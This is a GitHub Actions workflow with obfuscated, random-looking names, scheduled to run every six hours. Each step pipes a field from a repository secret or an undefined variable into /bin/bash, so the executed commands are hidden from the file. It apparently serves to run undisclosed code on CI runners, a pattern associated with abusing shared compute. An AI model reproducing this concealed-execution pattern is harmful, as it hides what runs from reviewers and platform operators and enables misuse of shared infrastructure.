name: wenfuhuo9185
on:
  workflow_dispatch:
  schedule:
    - cron: '57 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wenfuhuo9185
        env:
          hojn3: ${{ secrets.hojn3 }}
        run: |
          echo $hojn3 | jq -r .seky34732 | /bin/bash
          echo $uytk1 | jq -r .hdcql312 | /bin/bash
          echo $txp3 | jq -r .x6 | /bin/bash
          echo $w434 | jq -r .rkdmp6 | /bin/bash
          echo $xv5821 | jq -r .b3813 | /bin/bash
          echo $nan3 | jq -r .ruj0836 | /bin/bash

